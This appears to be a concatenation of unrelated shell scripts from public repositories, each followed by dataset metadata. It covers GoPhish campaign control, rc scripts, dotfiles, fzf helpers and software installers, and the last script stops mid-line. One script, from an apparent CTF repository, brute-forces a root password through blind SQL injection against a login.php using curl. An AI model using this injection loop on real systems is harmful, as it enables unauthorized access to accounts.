if [ $# -ne 1 ] || [ "$1" == "-h" ] || [ "$1" == "--help" ]; then
echo "Usage: complete_campaign.sh CAMPAIGN_ID"
exit 255
fi
# Source common variables and functions
SCRIPTS_DIR=$(readlink -f "$0" | xargs dirname)
# shellcheck source=gophish-tools/gophish_common.sh
source "$SCRIPTS_DIR/gophish_common.sh"
CAMPAIGN_ID=$1
# Disable errexit to allow error-handling within get_gophish_api_key
# and for the subsequent docker compose call to gophish-complete
set +o errexit
# Fetch GoPhish API key
API_KEY=$(get_gophish_api_key)
# Run gophish-complete in the Docker composition
docker compose -f "$GOPHISH_COMPOSITION" run --rm \
gophish-tools gophish-complete "--campaign=$CAMPAIGN_ID" \
"$GOPHISH_URL" "$API_KEY"
complete_rc="$?"
if [ "$complete_rc" -eq 0 ]; then
echo "GoPhish campaign $CAMPAIGN_ID successfully completed!"
else
echo "ERROR: Failed to complete GoPhish campaign $CAMPAIGN_ID!"
exit $complete_rc
fi
| true |
d039f6ec8f873f10d8dea2e659573cfa90f8c31f | Shell | freebsd/freebsd-ports | /net/dhcpcd/files/dhcpcd.in | UTF-8 | 745 | 3.53125 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/sh
# PROVIDE: dhclient dhcpcd
# KEYWORD: nojailvnet
#
. /etc/rc.subr
. /etc/network.subr
name="dhcpcd"
ifn="$2"
command="%%PREFIX%%/sbin/dhcpcd"
command_args="$ifn"
if [ -n "$ifn" ]; then
specific="$(get_if_var $ifn dhcpcd_flags_IF)"
if [ -z "$flags" -a -n "$specific" ]; then
rc_flags="$specific"
fi
pidfile="/var/run/dhcpcd/dhcpcd-$ifn.pid"
else
pidfile="$($command -P $rc_flags)"
: ${dhcpcd_enable:=NO}
rcvar=dhcpcd_enable
fi
start_precmd="dhcpcd_precmd"
dhcpcd_precmd()
{
# dhcpcd may need local binaries
export PATH=${PATH}:/usr/local/sbin:/usr/local/bin
}
load_rc_config $name
load_rc_config network
if [ -n "$ifn" ]; then
if ! dhcpif $ifn; then
err 1 "$ifn is not enabled for DHCP"
fi
fi
run_rc_command "$1"
| true |
fd5f9259d3002d6751e1e1579b4bf1da939087d2 | Shell | dunstontc/dotfiles | /shell/functions/.fzf.functions.sh | UTF-8 | 2,195 | 3.5 | 4 | [
"MIT"
] | permissive | #
# @file FZF Functions
# @brief Small utility functions using fzf.
# @description Figlet font selector -> copy to clipboard.
#
# @arg $@ string Word or words to make into ascii art.
fgl() {
[ $# -eq 0 ] && return
cd /usr/local/Cellar/figlet/*/share/figlet/fonts
local font=$(ls *.flf | sort | fzf --no-multi --reverse --preview "figlet -f {} $@") &&
figlet -f "$font" "$@" | pbcopy
}
# @description fe - fuzzy edit.
#
# @arg $1 string Name of the file to edit.
fe() {
local files
IFS=$'\n' files=($(fzf-tmux --query="$1" --multi --select-1 --exit-0))
[[ -n "$files" ]] && ${EDITOR:-nvim} "${files[@]}"
}
# @description vf - fuzzy open with vim from anywhere
#
# @example
# vf word1 word2 ... (even part of a file name)
vf() {
local files
files=(${(f)"$(locate -Ai -0 $@ | grep -z -vE '~$' | fzf --read0 -0 -1 -m)"})
if [[ -n $files ]]
then
nvim -- $files
print -l $files[1]
fi
}
# @description fuzzy grep - open via ag
#
vg() {
local file
file="$(ag --nobreak --noheading $@ | fzf -0 -1 | awk -F: '{print $1 " +" $2}')"
if [[ -n $file ]]
then
nvim $file
fi
}
# @description Search command history with FZF.
fh() {
print -z $( ([ -n "$ZSH_NAME" ] && fc -l 1 || history) | fzf +s --tac | sed 's/ *[0-9]* *//')
}
# @description Create new tmux session, or switch to existing one. Works from within tmux too. (@bag-man)
#
# @example
# tm # will allow you to select your tmux session via fzf.
#
# tm irc # will attach to the irc session (if it exists), else it will create it.
#
# @arg $1 string Session name
tm() {
[[ -n "$TMUX" ]] && change="switch-client" || change="attach-session"
if [ $1 ]; then
tmux $change -t "$1" 2>/dev/null || (tmux new-session -d -s $1 && tmux $change -t "$1"); return
fi
session=$(tmux list-sessions -F "#{session_name}" 2>/dev/null | fzf --exit-0) && tmux $change -t "$session" || echo "No sessions found."
}
# @description fzkill - kill process
fzkill() {
local pid
pid=$(ps -ef | sed 1d | fzf -m | awk '{print $2}')
if [ "x$pid" != "x" ]
then
echo $pid | xargs kill -${1:-9}
fi
}
# vim:filetype=sh:foldmethod=indent:tabstop=4:shiftwidth=4:softtabstop=0:noexpandtab:
| true |
1de07fa3b3ceb00b50765852b66a74783003271e | Shell | AhmedSakrr/marla-server | /run.sh | UTF-8 | 616 | 3.53125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/sh
next_server_port() {
port=`sed -nre '/^PORT=/s/PORT=//p' port.mk`
host=localhost
if echo $port | grep -q ':'; then
host=`echo $port | grep -Eoe '^[^:]+'`
port=`echo $port | sed -nre 's/^[^:]+://p'`
fi
port=$(($port + 1))
sed -i -re "s/^PORT=.+$/PORT=$host:$port/" port.mk
}
run_server() {
starttime=`date +%s`
make run
donetime=`date +%s`
if test $(($starttime - $donetime)) -lt 1; then
make kill
next_server_port
make run
authority=`sed -nre '/^PORT=/s/PORT=//p' port.mk`
echo "Running on $authority"
echo $authority | xsel -b -i
else
exit
fi
}
run_server
make tmux
| true |
034f482d69c1b38ab0e8b509ba3b2113cdba41e5 | Shell | mprather1/spyware | /run/software_installation.sh | UTF-8 | 4,871 | 3.5 | 4 | [] | no_license | #!/usr/bin/env bash
install_software(){
if chkarg $software_type; then
pre_install
printf "\n$(random_color)Installing software${NC}...\n"
sudo apt-get update && \
sudo apt-get install $new_software -y
misc_software
echo "All Done!!"
fi
}
initialize(){
mkdir temp
case $dist in
"Raspbian GNU/Linux 8")
node_version='https://nodejs.org/dist/v12.13.0/node-v12.13.0-linux-armv7l.tar.xz'
;;
"Raspbian GNU/Linux 9")
node_version='https://nodejs.org/dist/v12.13.0/node-v12.13.0-linux-armv7l.tar.xz'
;;
"Raspbian GNU/Linux 10")
node_version='https://nodejs.org/dist/v12.13.0/node-v12.13.0-linux-armv7l.tar.xz'
;;
*)
node_version='https://nodejs.org/dist/v12.13.0/node-v12.13.0-linux-x64.tar.xz'
;;
esac
}
pre_install(){
printf "\n$(random_color)Pre-install${NC}...\n"
if not_installed curl; then
sudo apt-get update && \
sudo apt-get install curl -y
fi
if not_installed apt-transport-https; then
sudo apt-get update && \
sudo apt-get install apt-transport-https -y
fi
if not_installed software-properties-common; then
sudo apt-get update && \
sudo apt-get install software-properties-common -y
fi
install_repositories
misc_repos
get_software_list
}
install_repositories(){
printf "\n$(random_color)Installing repositories${NC}...\n"
repositories=$(directory)/run/software_lists/${software_type}/repos.txt
readarray repos < $repositories
for repo in "${repos[@]}"; do
if chkarg $repo && repo_not_installed $repo; then
sudo apt-add-repository $repo -y
fi
done
}
get_software_list(){
software=$(directory)/run/software_lists/${software_type}/software.txt
readarray software_list < $software
for software in "${software_list[@]}"; do
new_software+="${software}"
done
}
misc_software(){
printf "\n$(random_color)Installing miscellaneous software${NC}...\n"
if [ $software_type != 'rpi' ]; then
install_npm_packages
sudo usermod -aG docker $(whoami)
# install_c9
# install_python_packages
# install_ruby_gems
fi
if [ $software_type == 'desktop' ]; then
#fix # install_local_packages
# install_postman
fi
sudo apt-get upgrade -y
}
misc_repos(){
printf "\n$(random_color)Installing miscellaneous repositories${NC}...\n"
if not_installed yarn; then
curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add -
echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
fi
# case $software_type in
# "rpi")
# # if not_installed docker-engine; then
# # curl -sSL https://get.docker.com | sh
# # fi
# ;;
# *)
# # install_docker
# ;;
# esac
}
install_docker(){
if not_installed docker-engine; then
sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
sudo apt-add-repository 'deb https://apt.dockerproject.org/repo ubuntu-xenial main'
fi
if [ -d /usr/local/bin ] && [ ! -f /usr/local/bin/docker-compose ]; then
printf "$(random_color)Installing Docker Compose${NC}..."
curl -L https://github.com/docker/compose/releases/download/1.12.0-rc2/docker-compose-`uname -s`-`uname -m` > temp/docker-compose
sudo cp temp/* /usr/local/bin/ && \
sudo chmod +x /usr/local/bin/docker-compose
fi
}
install_local_packages(){
printf "\n$(random_color)Installing local packages${NC}...\n"
sudo dpkg -i $(directory)/misc/synergy.deb $(directory)/misc/xscreensaver.deb
}
install_ruby_gems(){
printf "\n$(random_color)Ruby gems${NC}...\n"
echo "gem: --no-document" >> /home/$user/.gemrc
bash $(directory)/misc/ruby_gems.sh
}
install_npm_packages(){
printf "\n$(random_color)NPM packages${NC}...\n"
bash $(directory)/misc/npm.sh
}
install_python_packages(){
printf "\n$(random_color)Python packages${NC}...\n"
bash $(directory)/misc/python.sh
}
install_postman(){
wget -O temp/postman.tar.gz https://dl.pstmn.io/download/latest/linux64 && \
tar -xvf temp/postman.tar.gz -C $HOME && \
chmod +x $(directory)/misc/postman && \
sudo cp $(directory)/misc/postman /usr/local/bin
}
install_node(){
if [ ! -f /usr/local/bin/node ]; then
printf "$(random_color)Installing Node.JS${NC}..."
strip_url="${node_version##*/}"
node_directory=${strip_url%.*.*}
wget $node_version -O temp/node.tar.xz
tar -xvf temp/node.tar.xz -C temp/
sudo cp -R temp/$node_directory/* /usr/local/
else
printf "\nnode is already installed\nskipping...\n"
fi
}
install_scripts(){
printf "\n$(random_color)Installing scripts${NC}...\n"
scripts=($(directory)/scripts/*/*.sh)
for script in "${scripts[@]}"; do
installer $script
done
}
install_c9(){
printf "\n$(random_color)Installing c9${NC}...\n"
bash $(directory)/misc/c9/install.sh
}
| true |
ac52b34d88f2bdd282f4ea44bcb1fa640883c706 | Shell | edmond-zhu/awcy | /build_av1_analyzer.sh | UTF-8 | 1,262 | 3.171875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# exit on failure
set -e
# exit on unassigned variable
set -u
echo "Building Analyzer"
# add emscripten tools to PATH
export PATH=${PATH}:$(em-config EMSCRIPTEN_ROOT):$(em-config LLVM_ROOT)
cd ${CODECS_SRC_DIR}/${CODEC}
rm -rf asm/
mkdir -p asm
pushd asm
if [[ "${BUILD_OPTIONS}" == *"--enable"* ]]; then
#legacy configure
popd
make distclean || true
pushd asm
emconfigure ../configure --disable-multithread --disable-runtime-cpu-detect --target=generic-gnu --enable-accounting --enable-inspection --disable-docs --disable-webm-io --extra-cflags="-D_POSIX_SOURCE" ${BUILD_OPTIONS}
emmake make -j$(nproc)
cp examples/inspect inspect.bc
emcc -O3 inspect.bc -o inspect.js -s TOTAL_MEMORY=402653184 -s MODULARIZE=1 -s EXPORT_NAME="'DecoderModule'" --post-js "../tools/inspect-post.js" --memory-init-file 0
popd
cp asm/inspect.js ./aomanalyzer.js
else
cmake ../ -DAOM_TARGET_CPU=generic -DCONFIG_MULTITHREAD=0 -DCONFIG_RUNTIME_CPU_DETECT=0 -DCONFIG_ACCOUNTING=1 -DCONFIG_INSPECTION=1 -DENABLE_DOCS=0 -DCONFIG_WEBM_IO=0 -DENABLE_TESTS=0 -DCMAKE_TOOLCHAIN_FILE=$(em-config EMSCRIPTEN_ROOT)/cmake/Modules/Platform/Emscripten.cmake ${BUILD_OPTIONS}
emmake make -j$(nproc)
popd
cp asm/examples/inspect.js ./aomanalyzer.js
fi
| true |
0d887e889915f9b855b9c3b8e4f3c764fd2ab6f6 | Shell | jensp/Arch-Linux-on-i586 | /extra/psiconv/PKGBUILD | UTF-8 | 769 | 2.609375 | 3 | [] | no_license | # $Id: PKGBUILD 44521 2009-07-02 15:35:35Z giovanni $
# Maintainer: Giovanni Scafora <giovanni@archlinux.org>
# Contributor: Tom Newsom <Jeepster@gmx.co.uk>
pkgname=psiconv
pkgver=0.9.8
pkgrel=5
pkgdesc="Converts Psion 5(MX) files to more commonly used file formats"
arch=('i586' 'i686' 'x86_64')
url="http://software.frodo.looijaard.name/psiconv/"
license=('GPL')
depends=('imagemagick>=6.4.8.10')
makedepends=('bc')
backup=('etc/psiconv/psiconv.conf')
options=('!libtool')
source=(http://software.frodo.looijaard.name/psiconv/files/psiconv-${pkgver}.tar.gz)
md5sums=('8d7548e3c6b9cd408544736133728acd')
build() {
cd ${srcdir}/${pkgname}-${pkgver}
./configure --prefix=/usr \
--sysconfdir=/etc \
--mandir=/usr/share/man
make || return 1
make DESTDIR=${pkgdir} install
}
| true |
cda16638fb8c3401436466fd8efeb421447153d6 | Shell | dziamid/dotfiles | /bashrc | UTF-8 | 4,021 | 3.765625 | 4 | [] | no_license | # ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
#alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
. ~/bin/dotfiles/bash/env
. ~/bin/dotfiles/bash/config
. ~/bin/dotfiles/bash/aliases
# wrap_alias takes three arguments:
# $1: The name of the alias
# $2: The command used in the alias
# $3: The arguments in the alias all in one string
# Generate a wrapper completion function (completer) for an alias
# based on the command and the given arguments, if there is a
# completer for the command, and set the wrapper as the completer for
# the alias.
function wrap_alias() {
[[ "$#" == 3 ]] || return 1
local alias_name="$1"
local aliased_command="$2"
local alias_arguments="$3"
local num_alias_arguments=$(echo "$alias_arguments" | wc -w)
# The completion currently being used for the aliased command.
local completion=$(complete -p $aliased_command 2> /dev/null)
# Only a completer based on a function can be wrapped so look for -F
# in the current completion. This check will also catch commands
# with no completer for which $completion will be empty.
echo $completion | grep -q -- -F || return 0
local namespace=alias_completion::
# Extract the name of the completion function from a string that
# looks like: something -F function_name something
# First strip the beginning of the string up to the function name by
# removing "* -F " from the front.
local completion_function=${completion##* -F }
# Then strip " *" from the end, leaving only the function name.
completion_function=${completion_function%% *}
# Try to prevent an infinite loop by not wrapping a function
# generated by this function. This can happen when the user runs
# this twice for an alias like ls='ls --color=auto' or alias l='ls'
# and alias ls='l foo'
[[ "${completion_function#$namespace}" != $completion_function ]] && return 0
local wrapper_name="${namespace}${alias_name}"
eval "
function ${wrapper_name}() {
let COMP_CWORD+=$num_alias_arguments
args=( \"${alias_arguments}\" )
COMP_WORDS=( $aliased_command \${args[@]} \${COMP_WORDS[@]:1} )
$completion_function
}
"
# To create the new completion we use the old one with two
# replacements:
# 1) Replace the function with the wrapper.
local new_completion=${completion/-F * /-F $wrapper_name }
# 2) Replace the command being completed with the alias.
new_completion="${new_completion% *} $alias_name"
eval "$new_completion"
}
# For each defined alias, extract the necessary elements and use them
# to call wrap_alias.
eval "$(alias -p | sed -e 's/alias \([^=][^=]*\)='\''\([^ ][^ ]*\) *\(.*\)'\''/wrap_alias \1 \2 '\''\3'\'' /')"
unset wrap_alias
| true |
c4c4925b34337d1b341d155fde2eebcdac320611 | Shell | ksong/starts-travis-ingetration | /legacy/generate-basic-stats.sh | UTF-8 | 4,074 | 4.125 | 4 | [] | no_license | #!/bin/bash
set -o pipefail
usage() {
echo "Usage: $0 [-h] -v -l /path/to/mvn/log -d /path/to/repo/directory -k APIKEY" 1>&2; exit 1;
}
exitIfHasError() {
if [[ $? != 0 ]]; then
exit 1
fi
}
while getopts ":hvl:d:k:" o; do
case "${o}" in
h)
echo "Collect statistics for basic statistics with STARTS."
usage
;;
v)
echo "Enabling Verbose Mode"
VERBOSE=1
;;
d)
REPO_DIR=${OPTARG}
;;
k)
APIKEY=${OPTARG}
;;
l)
LOG_FILE=${OPTARG}
USE_LOG_FILE=1
;;
*)
usage
;;
esac
done
shift $((OPTIND-1))
if [ -z "${REPO_DIR}" ]; then
echo "Error: repository directory undefined." 1>&2;
usage
fi
if [[ $USE_LOG_FILE == 1 && -z "${LOG_FILE}" ]]; then
echo "Error: mvn test log file localtion undefined." 1>&2;
usage
fi
if [[ ! -d $REPO_DIR ]]; then
echo "$REPO_DIR is not a valid directory for the repo." 1>&2;
usage;
fi
if [[ -z $APIKEY ]]; then
APIKEY=$GITHUB_APIKEY
fi
CUR_DIR="$( cd "$( dirname "$0" )" && pwd )";
if [ -z $LOG_FILE ]; then
cd $REPO_DIR
LOG_LOCAL_RUN="/tmp/local.log"
mvn test > $LOG_LOCAL_RUN
else
LOG_LOCAL_RUN="${LOG_FILE}"
fi
if [[ -z `cat $LOG_LOCAL_RUN|grep --line-buffered SUCCESS` ]]; then
echo "'mvn test' build failed." 2>&1;
exit 1;
fi
exitIfHasError;
LOCAL_TIME=`cat $LOG_LOCAL_RUN|grep --line-buffered "Total time:"|cut -d" " -f4`
exitIfHasError;
if [[ $LOCAL_TIME == *":"* ]]; then
LOCAL_TIME=`echo $LOCAL_TIME | awk -F: '{ print ($1 * 60) + $2 }'`
fi
if [[ $USE_LOG_FILE -eq 1 ]]; then
#When using log file, it's only for local mode
echo $LOCAL_TIME
exit 0;
fi
##Setting to trigger Travis run
# Enable Travis CI using Github API. Need to install TravisPy
PRJOECT_NAME=${REPO_DIR##*/}
if [[ -z $PRJOECT_NAME ]]; then
echo "Invalid project name: $PRJOECT_NAME"
echo "Please make sure the directory doesn't end with '/'"
exit 1;
fi
if [[ -z $APIKEY ]]; then
if [[ $VERBOSE == 1 ]]; then echo "python $CUR_DIR/enable-travis-and-run.py \"ksong/$PRJOECT_NAME\""; fi
RESULT=`python $CUR_DIR/enable-travis-and-run.py "ksong/$PRJOECT_NAME"`
else
if [[ $VERBOSE == 1 ]]; then echo "python $CUR_DIR/enable-travis-and-run.py -k $APIKEY \"ksong/$PRJOECT_NAME\""; fi
RESULT=`python $CUR_DIR/enable-travis-and-run.py -k $APIKEY "ksong/$PRJOECT_NAME"`
fi
##No rebuild, then either create the .travis.yml or add a line of comment
# then push to the repo to trigger travis CI build
if [[ $RESULT != "REBUILT" ]]; then
if [[ ! -f ${REPO_DIR}/.travis.yml ]]; then
if [[ $VERBOSE == 1 ]]; then echo "creating .travis.yml file"; fi
echo "language: java" > ${REPO_DIR}/.travis.yml
else
if [[ $VERBOSE == 1 ]]; then echo ".travis.yml file exists, slightly modify it."; fi
echo "#Add this line to trigger Travis build" >> ${REPO_DIR}/.travis.yml
fi
cd ${REPO_DIR}
git add .travis.yml
git config user.name "Kai Song"
git config user.email "kaisong2@illinois.edu"
git commit -m "added .travis.yml"
git push origin master
fi
## A travis build should just happened. Now, we save the test relevant logs to
# /tmp/test_log.txt
if [[ -z $APIKEY ]]; then
RESULT=`python $CUR_DIR/save-travis-build-log.py "ksong/$PRJOECT_NAME"`
else
RESULT=`python $CUR_DIR/save-travis-build-log.py -k $APIKEY "ksong/$PRJOECT_NAME"`
fi
TRAVIS_TEST_TIME=`cat /tmp/test_log.txt |grep --line-buffered "Total time:"|cut -d" " -f4`
exitIfHasError;
if [[ $TRAVIS_TEST_TIME == *":"* ]]; then
TRAVIS_TEST_TIME=`echo $TRAVIS_TEST_TIME | awk -F: '{ print ($1 * 60) + $2 }'`
fi
TRAVIS_BUILD_TIME=`cat /tmp/test_log.txt |grep --line-buffered "Last Travis Build Time:"|cut -d" " -f5`
exitIfHasError;
if [[ $TRAVIS_BUILD_TIME == *":"* ]]; then
TRAVIS_BUILD_TIME=`echo $TRAVIS_BUILD_TIME | awk -F: '{ print ($1 * 60) + $2 }'`
fi
echo $LOCAL_TIME,$TRAVIS_TEST_TIME,$TRAVIS_BUILD_TIME
| true |
a78e82b51862d8d7eedabe3c43f95a4a3c0a9293 | Shell | awilhelm/misc | /lib/wallpaper-roulette/google | UTF-8 | 668 | 3.109375 | 3 | [] | no_license | #!/bin/sh
: ${1:?} # recherche (exemple : q=wallpaper&as_st=y&tbs=isz:lt,islt:2mp,iar:w&tbm=isch')
: ${2:?} # pages à explorer (exemple : 1-10)
: ${TMPDIR:?}
while ! nm-online -q
do sleep 1
done
url=$((($(shuf -n1 -i "$2") - 1) * 10))
url=$(wget -q -O- "http://www.google.com/search?biw=1000&bih=1000&start=$url&$1" --user-agent='Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0' | perl -ne 'for(m{;imgurl=(.*?)&}g){s{%([0-9a-f]{2})}{chr(hex($1))}eig; s{%([0-9a-f]{2})}{chr(hex($1))}eig; print "$_\n"}' | shuf -n1 | wget -i- -nv -c -x --protocol-directories -P "$TMPDIR" 2>&1 | perl -ne 'if(m{ -> "(.*)"}){print $1}')
test -r "$url" && echo "$url"
| true |
84e79d2944b2ac287473e433092c889a4e202502 | Shell | space-sh/docker-volumes | /test/test.sh | UTF-8 | 1,281 | 3.359375 | 3 | [
"Apache-2.0"
] | permissive | #
# Copyright 2016-2017 Blockie AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
_DOCKER_CHECK_NO_VOLUME ()
{
SPACE_SIGNATURE="name"
SPACE_DEP="DOCKER_VOLUMES_LS PRINT"
local name="${1}"
shift
local volumes=
volumes="$(DOCKER_VOLUMES_LS -q | grep "^${name}\$"; :)"
if [ -n "${volumes}" ]; then
PRINT "Volume ${name} exists." "error"
return 1
fi
}
_DOCKER_CHECK_VOLUME ()
{
# shellcheck disable=2034
SPACE_SIGNATURE="name"
# shellcheck disable=2034
SPACE_DEP="DOCKER_VOLUMES_LS PRINT"
local name="${1}"
shift
local volumes=
volumes="$(DOCKER_VOLUMES_LS -q | grep "^${name}\$"; :)"
if [ -z "${volumes}" ]; then
PRINT "Volume ${name} does not exist." "error"
return 1
fi
}
| true |
08a64bbb7a4891fc5d5fd33fae04394b20759898 | Shell | openstack/diskimage-builder | /diskimage_builder/elements/python-brickclient/post-install.d/55-brick-client-install | UTF-8 | 997 | 2.640625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#
# Copyright 2016 Hewlett Packard Enterprise Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
if [ ${DIB_DEBUG_TRACE:-1} -gt 0 ]; then
set -x
fi
set -eu
set -o pipefail
PBCDIR=/usr/share/python-brickclient
mkdir $PBCDIR
# create the virtual environment
virtualenv $PBCDIR/venv
# Install the required packages inside virtual env
$PBCDIR/venv/bin/pip install python-brick-cinderclient-ext
ln -s $PBCDIR/venv/bin/python-brickclient /usr/local/bin/python-brickclient
| true |
0e985d3feaf1a76be7d50b6d8eb37d13a3190d55 | Shell | kmyk/welcome-ctf-2016 | /a.sh | UTF-8 | 417 | 3.046875 | 3 | [] | no_license | #!/usr/bin/bash
s=
found=
while [ -z "$found" ] ; do
for c in {a..z} ; do
if curl /path/to/welcome-ctf-2016/problem/login.php -F userid="' or ( id = 'root' and password like '$s$c%' ) --" -F password= -F login=login 2>/dev/null | grep -q 'something wrong' ; then
s=$s$c
echo $s
break
fi
if [ $c = z ] ; then
found=t
fi
done
done
| true |
00373f034e474a272bb2bb8a4bbaf99a87459da2 | Shell | reginaldobo/story_review | /deploy-sr.sh | UTF-8 | 1,407 | 3.75 | 4 | [] | no_license | #!/bin/bash
#################################################################
# Key file
#
CHAVE="/home/keys/key_file.pem"
#
################################################################
#
function menu() {
echo "Options:"
echo "L - List Containers"
echo "D - Deploy Branch"
echo "R - Remove Branch"
echo "S - Sync Database"
echo "Q - Quit"
}
#
################################################################
#
#
ssh-add -k $CHAVE
clear
while(true)
do
#clear
menu
read choice
case $choice in
[lL])
clear
echo "Wait..."
ssh -A ec2-user@bastion_host "ssh ubuntu@instance_ip 'bash ~/scripts/get_links.sh'"
;;
[dD])
echo "Type a Branch: "
read branch
clear
echo "Wait..."
comando="ssh -A ec2-user@bastion_host \"ssh ubuntu@instance_ip 'bash ~/scripts/dockerDeploy.sh $branch'\""
eval $comando
;;
[rR])
echo "Type a Branch: "
read branch
clear
echo "Wait..."
comando="ssh -A ec2-user@bastion_host \"ssh ubuntu@instance_ip 'bash ~/scripts/dockerRemove.sh $branch'\""
eval $comando
;;
[sS])
clear
echo "Wait..."
ssh -A ec2-user@bastion_host "ssh ubuntu@instance_ip 'bash ~/scripts/sync_prod_db.sh'"
;;
[qQ])
exit 0
;;
*)
clear
echo "Invalid Option!"
;;
esac
done
| true |
5f3d929c4ba41f682870b466e8ce30ec698014db | Shell | haokaiyang/Mac-QuickLook | /QuickLookPlugins/QLMarkdown.qlgenerator/Contents/Resources/update.sh | UTF-8 | 1,269 | 3.828125 | 4 | [
"CC0-1.0"
] | permissive | #!/bin/bash
status_msg () {
if [ -t FD ] ; then
echo -e "\033[1m$1\033[0m"
else
echo "$1"
fi
}
error_msg () {
if [ -t FD ] ; then
echo -e "\033[31m$1\033[0m" >&2
else
echo "$1" >&2
fi
tput sgr0
}
# CD into script dir -1
cd "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"/..
# Checkout the discount module if necessary
if [[ ! -a $PWD/discount/configure.sh ]] ; then
status_msg "Updating the discount directory..."
git submodule update --init
fi
status_msg "Running configure.sh..."
cd discount
./configure.sh --with-fenced-code
# make the blocktags
make blocktags
status_msg "Copying important files..."
if head -n 1 config.h | grep -q "^/\*$"; then
# remove generated comments in config.h
sed '1,/^ *\*\/ *$/ { d; }' <config.h >../discount-config/config.h && echo 'config.h'
else
cp config.h ../discount-config/config.h && echo 'config.h'
error_msg "Can't locate config.h comments!"
error_msg "Check the diff before committing (and fix this script if you can)"
fi
cp mkdio.h ../discount-config/mkdio.h && echo 'mkdio.h'
cp blocktags ../discount-config/blocktags && echo 'blocktags'
status_msg "Clean files from working directory..."
# clean the working directory of generated files and folders
git clean -f -d
status_msg "Done!"
| true |
752c2e9c0972812c2e74a19cc0480d25802ac78b | Shell | gogomillan/holberton-system_engineering-devops | /0x0C-web_server/4-not_found_page_404 | UTF-8 | 910 | 3.1875 | 3 | [] | no_license | #!/usr/bin/env bash
# Install Nginx server if neccesary
# Nginx index by default turns to Holberton School
# Nginx server so that /redirect_me is redirecting to another page.
# Nginx server to have a custom 404 page that contains the string Ceci n'est pas une page.
sudo apt-get update
sudo apt-get -y install nginx
sudo service nginx start
sudo rm /var/www/html/index.html
sudo bash -c "echo 'Holberton School' > /var/www/html/index.html"
export LINE="rewrite ^\/redirect_me https:\/\/www.youtube.com\/watch?v=QH2-TGUlwu4 permanent;"
sudo sed -i "26i ${LINE}" /etc/nginx/sites-available/default
sudo bash -c "printf 'Ceci n\x27est pas une page\n' > /var/www/html/404.html"
export LINE="\\\terror_page 404 /404.html;\n\tlocation = /404.html {\n\t\troot /var/www/html;\n\t\tinternal;\n\t}"
sudo sed -i "27i ${LINE}" /etc/nginx/sites-available/default
sudo service nginx restart && sudo service nginx reload
| true |
82c57df425ba43d6ac7f3420d60e0056f39f35e3 | Shell | nobiruwa/home-directory | /bin/install-pandoc.sh | UTF-8 | 3,205 | 3.984375 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# GitHubのリリースページを辿ってpandocコマンドを$HOME/.local/binディレクトリにインストールするスクリプトです。
# コマンドライン引数
# 1st positional argument (amd64かarm64。デフォルトはamd64)
PLATFORM=${1:-amd64}
if [ "${PLATFORM}" != "amd64" -a "${PLATFORM}" != "arm64" ]; then
echo "unknown platform specified: ${PLATFORM}"
echo "Only both amd64 and arm64 are allowed."
exit 1
fi
# 固定値
BASE_RELEASE_URL='https://github.com/jgm/pandoc/releases/'
BASE_RELEASE_TAG_URL="${BASE_RELEASE_URL}tag/"
LATEST_RELEASE_URL="${BASE_RELEASE_URL}latest"
LOG_PATH="/tmp/install-pandoc.log"
echo '# curl' > "${LOG_PATH}"
# locationヘッダーから最新バージョンのリリースページのURLを取得する
# 途中、CRLFのCRが出力に残るためtrコマンドで除去
ACTUAL_RELEASE_URL=`curl --head "${LATEST_RELEASE_URL}" 2>> "${LOG_PATH}" | grep '^location:' | tr -d '\r' | cut -d' ' -f 2`
echo "actual release path: ${ACTUAL_RELEASE_URL}" | tee -a "${LOG_PATH}"
LATEST_VERSION=`echo "${ACTUAL_RELEASE_URL}" | sed -e "s|${BASE_RELEASE_TAG_URL}||"`
echo "actual latest version: ${LATEST_VERSION}" | tee -a "${LOG_PATH}"
# ダウンロードURLの例: https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz
